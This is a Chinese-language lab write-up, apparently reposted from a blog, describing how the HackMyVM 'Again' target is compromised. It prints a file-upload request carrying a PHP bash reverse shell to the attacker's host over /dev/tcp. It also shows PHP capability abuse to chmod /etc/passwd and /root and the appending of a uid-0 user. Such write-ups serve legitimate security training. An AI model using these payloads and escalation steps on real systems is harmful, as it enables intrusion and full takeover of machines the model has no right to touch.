当前位置: 首页 > article >正文

HackMyVM-Again靶机的测试报告

目录

一、测试环境

1、系统环境

2、使用工具/软件

二、测试目的

三、操作过程

1、信息搜集

2、Getshell

3、提权

四、结论


一、测试环境

1、系统环境

渗透机:kali2021.1(192.168.101.127)

靶  机:Linux(192.168.101.204)

物理机:win11(192.168.101.241)

注意事项:

①该类型靶场只能在virtualBox上搭建,因此将靶机设置为桥接网络,方便进行渗透。攻击机kali也要桥接出来,不然会出问题。

②靶机启动失败:设置中取消勾选usb即可

2、使用工具/软件

Kali: arp-scan(主机探测)、nmap(端口和服务扫描)、dirsearch(目录扫描)、nc(监听shell)、openssl(生成密码)

物理机:Burp suite(抓包分析)

靶场介绍:由国外大佬搭建的靶场,类似于vulnhub,经常更新,需要翻墙才能进。

地址:https://hackmyvm.eu/machines/machine.php?vm=Again

测试网址:http://192.168.101.204

二、测试目的

分析文件上传的源代码并绕过限制上传webshell,使用php Capabilities提权获得root权限。

三、操作过程

1、信息搜集

主机探测

arp-scan -l

靶机IP:192.168.101.204

物理机IP:192.168.101.241

端口和服务探测

nmap -sT -A -p- -T4 192.168.101.204

可以看到靶机开启了22端口(ssh服务)、80端口(web服务)

目录扫描

dirsearch -u http://192.168.101.204 -i 200,301 --exclude-sizes=0B

只扫到一个页面,upload

2、Getshell

访问web主页是一个上传文件的页面,upload.php是上传的文件显示的页面

查看主页面的源代码发现,提示.bck文件删除,那就是没删喽

访问upload.bck成功下载文件

该文件是upload.php的备份源代码,那么现在可以做白盒测试了

可以看到,设置了黑名单符号,有黑名单符号会直接退出代码,这样上传的文件就不会移走了

此外,源代码设置的白名单jpg和txt,只检查了jpg文件,其他文件都算作txt文件上传了,并执行cat命令查看

尝试在cat命令后面进行拼接代码执行,但由于黑名单限制过多,是失败的

利用代码检测到黑名单符号就退出代码的特性,而文件不会删除,会保留

利用这一特性写入反弹shell文件;1.php

数据包如下

POST /upload.php HTTP/1.1

Host: 192.168.101.204

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate, br

Content-Type: multipart/form-data; boundary=---------------------------42491598439165519721451805444

Content-Length: 300

Origin: http://192.168.101.204

Connection: keep-alive

Referer: http://192.168.101.204/

Upgrade-Insecure-Requests: 1

Priority: u=0, i

-----------------------------42491598439165519721451805444

Content-Disposition: form-data; name="myFile"; filename=";1.php"

Content-Type: image/jpeg

    <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.101.127/6666 0>&1'"); ?>

-----------------------------42491598439165519721451805444—

可以访问该文件,此时kali开启监听即可监听到反弹shell

成功获取反弹shell

3、提权

当前目录有一个id_rsa.bck文件,但没什么用

尝试寻找可利用文件

find / -perm -4000 -ls 2>/dev/null
find / -perm -2000 -ls 2>/dev/null
getcap -r / 2>/dev/null

getcap命令可以查找文件的能力信息。

Linux 中的“能力”是一种对进程授权的机制,它允许程序在不拥有完整 root 权限的情况下执行某些特权操作。

某些程序可能被赋予了cap_fowner(修改文件所有权)或cap_net_raw(允许直接访问网络协议栈)等能力,这样它们就可以执行本来只有 root 用户才能执行的操作

可以看到php7.4可以修改文件所有权,可以利用

那么就用php来修改文件的权限,先修改user.txt的权限并查看

ls -la /home
ls -la /home/kerszi
php -r 'chmod("/home/kerszi/user.txt",0777);'

查看user.txt文件内容,得到第一个flag:

nowtheeasypart

cat /home/kerszi/user.txt

同理可以修改/root目录的权限,r00t.txt文件的权限,查看root用户的flag:

andagainandagainandagain

php -r 'chmod("/root",0777);'
ls -la /root
php -r 'chmod("/root/r00t.txt",0777);'
cat /root/r00t.txt

提权root用户也很简单,修改/etc/passwd文件的权限并给写入一个uid为0的用户即可

php -r 'chmod("/etc/passwd",0777);'

先修改权限

openssl passwd -1 root

再生成密码的加密字符串

构造新用户zz,uid为0,写入/etc/passwd

echo 'zz:$1$8YXciopU$8Z/z.3wtGbL7YHfCAy.e11:0:0:root:/root:/bin/bash' >> /etc/passwd
su zz

成功写入用户,并提权root

SHELL=/bin/bash script -q 2>/dev/null

四、结论

利用文件上传逻辑的漏洞getshell,利用Capabilities提权获取root权限。Linux中可以设置能力setcap,可以让某个文件以更高权限执行。


http://www.kler.cn/a/470620.html

相关文章:

  • 【竞技宝】CS2:HLTV2024职业选手排名TOP8-broky
  • 对话|全年HUD前装将超330万台,疆程技术瞄准人机交互“第一屏”
  • AnaConda下载PyTorch慢的解决办法
  • Flutter Web 选取并上传图片
  • VR+智慧消防一体化决策平台
  • [微服务]redis主从集群搭建与优化
  • 【智能算法】改进蚁狮优化算法【matlab】
  • arkTs数据存储
  • Visual Studio 2022 C++ gRPC 环境搭建
  • 六十三:七层负载均衡做了些什么?
  • HTML——79.代码快捷输入方式
  • grouped.get_group((‘B‘, ‘A‘))选择分组
  • TensorFlow深度学习实战(4)——正则化技术详解
  • Golang,Let‘s GO!
  • 下载excel
  • Linux安装ubuntu
  • Tomcat解析
  • 40% 降本:多点 DMALL x StarRocks 的湖仓升级实战
  • 深入理解 Linux 管道:创建与应用详解(匿名管道进程池)
  • 学习随记:word2vec的distance程序源码注释、输入输出文件格式说明
  • Spark服装数据分析系统 大屏数据展示 智能服装推荐系统(协同过滤余弦函数)
  • 【three.js】模型-几何体Geometry,材质Material
  • redis的学习(三)
  • 保障移动应用安全:多层次安全策略应对新兴威胁
  • Unity-Mirror网络框架从入门到精通之Attributes属性介绍
  • AWS ALB基础知识